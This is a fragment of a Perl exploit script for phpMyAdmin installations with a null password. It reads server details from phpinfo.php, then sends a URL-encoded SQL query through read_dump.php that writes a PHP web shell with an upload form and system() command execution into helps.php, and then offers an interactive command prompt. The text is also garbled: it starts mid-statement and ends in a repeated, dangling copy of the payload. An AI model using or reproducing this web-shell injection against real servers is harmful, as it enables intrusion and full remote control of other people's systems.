print q{ ________________________________________________ Exploit for phpMyAdmin Null password Usage: perl PMANull.pl <site> <path> <do> Example: perl PMANull.pl www.target.com / 0 ________________________________________________ }; exit; } $ip = $ARGV[0]; $http = $ARGV[1]; $ip =~ s/(http:\/\/)//eg; $id = $ARGV[2]; $http .= "phpinfo.php"; $num = 0; if($id==2) { goto CMDS; } #$data = "username=andrejiao&from_url=%3C%7Bfrom_url%7D%3E&submit=Send+%3 E+%3E"; #$idata = (length($data)); $socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"[-] Couldn't connect!\n"; print "[+] Connected!\n"; httpcon($socks,"GET",$ip,$http,"!"); print "[+] Exploiting Target \r\n"; while($ans = <$socks>){ if($ans =~ /<tr><td class="e">System <\/td><td class="v">(.*)<\/td><\/tr>/) { print "[+] System Info: $1\r\n"; $num++; } if($ans =~ /<tr><td class="e">safe_mode<\/td><td class="v">(.*)<\/td><td class="v">/){ print "[+] Safe Mode: $1\r\n"; $num++; } if($ans =~ /_SERVER\["SCRIPT_FILENAME"\]<\/td><td class="v">(.*)\/phpinfo.php<\/td>/){ print "[+] Path: $1\r\n"; $path = $1; $num++; } } if(($num<3) && (!defined($path))) { print 'PHPInfo.php was not found\r\n'; print 'Would you like to continue <Y/N>:'; $tah = <STDIN>; chomp($tah); if($tah eq "Y") { print 'Please insert script path:'; $path = <STDIN>; } else { die "[+] Bye!\r\n"; } } $idata = "is_js_confirmed=0&lang=en-utf- 8&server=1&collation_connection=utf8_general_ci&db=mysql&pos=0&goto=db_ details.php&zero_rows=Your+SQL+query+has+been+executed+successfully&pre v_sql_query=&sql_query=use+mysql%3B%0D%0ACREATE+TABLE+temptab+ %28codetab+text%29%3B%0D%0AINSERT+INTO+temptab+%28codetab%29+ values+%28%27%3CFORM+ENCTYPE%3D%22multipart%2Fform%2Ddata%2 2+ACTION%3D%22helps%2Ephp%22+METHOD%3D%22POST%22%3E%3CI NPUT+TYPE%3D%22hidden%22+name%3D%22MAX%5FFILE%5FSIZE%22 +value%3D%22100000%22%3EUpload+this+file%3A+%3CINPUT+NAME%3D %22userfile%22+TYPE%3D%22file%22%3E%3CINPUT+TYPE%3D%22submit %22+VALUE%3D%22Send%22%3E%3C%2FFORM%3E%3C%3Fphp+move% 5Fuploaded%5Ffile%28%24userfile%2C+%22entrika%2Ephp%22%29%3B+%3F %3E%3C%3Fphp+if+%28%21empty%28%24%5FGET%5B%22c%22%5D%29 %29+%7B+echo+%22%3Cpre%3E%22%3B+system%28%24%5FGET%5B%22c %22%5D%29%3B+echo+%22%3C%2Fpre%3E%22%3B+%7D+exit%3B+%3F %3E%27%29%3B%0D%0ASELECT+%2A+INTO+OUTFILE+%27$path%2Fhel ps%2Ephp%27+from+temptab%3B%0D%0ADROP+TABLE+temptab%3B%0D %0AFLUSH+LOGS%3B+&show_query=1&SQL=Go&sql_file=&MAX_FILE_S IZE=16777216&sql_file_compression&charset_of_file=utf8"; $http = $ARGV[1]; $http .= "read_dump.php"; #$http .= "import.php"; $socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"[-] Couldn't connect!\n"; httpcon($socks,"POST",$ip,$http,$idata); while($ans = <$socks>){ if($ans =~ /<p><b>Error<\/b><\/p>/){ print "[-] Error was found!\r\n"; $sqlerror = 1; } if(($sqlerror==2) && ($ans =~ /<\/pre>/)){ $sqlerror=0; die "[-] Error!\r\n"; } if($sqlerror==2){ print "[-] Error: $ans"; } if(($sqlerror==1) && ($ans =~ /<pre>/)){ $sqlerror=2; } } print "[+] Shell Injected: $ip/$ARGV[1]/helps.php"; if($id==1) { die "[+] Bye!\r\n"; } CMDS: while (1){ $cout = 0; print "\r\nCMD> "; $cmd = <STDIN>; chomp($cmd); if(($cmd eq 'anquit') || (!defined($cmd))){ die "[+] Bye!"; } . "is_js_confirmed=0&lang=en-utf- 8&server=1&collation_connection=utf8_general_ci&db=mysql&pos=0&goto=db_ details.php&zero_rows=Your+SQL+query+has+been+executed+successfully&pre v_sql_query=&sql_query=use+mysql%3B%0D%0ACREATE+TABLE+temptab+ %28codetab+text%29%3B%0D%0AINSERT+INTO+temptab+%28codetab%29+ values+%28%27%3CFORM+ENCTYPE%3D%22multipart%2Fform%2Ddata%2 2+ACTION%3D%22helps%2Ephp%22+METHOD%3D%22POST%22%3E%3CI NPUT+TYPE%3D%22hidden%22+name%3D%22MAX%5FFILE%5FSIZE%22 +value%3D%22100000%22%3EUpload+this+file%3A+%3CINPUT+NAME%3D %22userfile%22+TYPE%3D%22file%22%3E%3CINPUT+TYPE%3D%22submit %22+VALUE%3D%22Send%22%3E%3C%2FFORM%3E%3C%3Fphp+move% 5Fuploaded%5Ffile%28%24userfile%2C+%22entrika%2Ephp%22%29%3B+%3F %3E%3C%3Fphp+if+%28%21empty%28%24%5FGET%5B%22c%22%5D%29 %29+%7B+echo+%22%3Cpre%3E%22%3B+system%28%24%5FGET%5B%22c %22%5D%29%3B+echo+%22%3C%2Fpre%3E%22%3B+%7D+exit%3B+%3F %3E%27%29%3B%0D%0ASELECT+%2A+INTO+OUTFILE+%27$path%2Fhel ps%2Ephp%27+from+temptab%3B%0D%0ADROP+TABLE+temptab%3B%0D %0AFLUSH+LOGS%3B+&show_query=1&SQL=Go&sql_file=&MAX_FILE_S IZE=16777216&sql_file_compression&charset_of_file=utf8";